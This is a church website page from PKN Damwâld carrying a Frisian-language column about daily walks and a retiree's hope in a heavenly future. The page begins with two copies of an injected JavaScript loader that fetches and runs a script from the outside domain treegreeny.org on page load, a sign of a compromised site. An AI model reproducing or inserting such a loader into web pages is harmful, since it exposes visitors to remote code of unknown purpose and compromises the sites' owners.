;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “nog in hiele takomst foar ús……..” - PKN Damwâld

“nog in hiele takomst foar ús……..”

Gepubliceerd op: vrijdag 13 november 2020

Neffens de saakkundigen is it in goede gewoante om alle dagen goed yn beweging te wêzen. No is it sa dat myn frou en ik “trendfolgers” bin dat sadwaande hâlde wy ús dér dan ek oan, alle dagen in oere te rinnen. De oare kant fan de medalje is fansels dat de slytage dan ek tanimt, dus de nije knibbels en heupen bin net oan te slepen, mar dat fansiden. Neist it soun en fit bliuwen hat it rinnen noch in foardiel: de sociale kontakten dy’t jo net meer yn’t tsjerke en by ferienigingen opdogge, ûntsteane no ûnderweis, faaks spontaan en ûnferwachts.    Sa troffen wy de ôfrûne wike in man dy’t lykas my ek  pensionado is. Wy ornearren dat it wol noflik is om ekris sûnder druk en stress troch  it leven te gean. Mar sa oppere ik, in pensionado wit ek dat hy of sy de langste tiid hân hat hjir op ierde!  Foar mysels sprutsen, ”it” sit my noch altiid achter, safolle wurk is der noch te dwaan en safolle wat my nog dwaande hâld. De persoan dy’t wy troffen tocht der hiel oars oer; Jonge, wy ha ommers nog in hiele takomst foar ús, sa sei er, en mocht it hjir in jier langer of koarter wêze op ierde, no dan is dat sa,mar der is ommers noch in Takomst foar ús weilein! As jo dér net fan witte, ja dan is it koart dei wie syn konklúzje. Wy kuieren fierder en de oare deis tocht ik; wat is it toch moai dat der minsken bin dy’t by alles wat der spilet yn it libben, de grutte Takomst foar eagen hâlde. Of sa’t ús Mem dan sei;  Wér makkest dy drok om, it komt goed,dat is ús tasein!

 

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns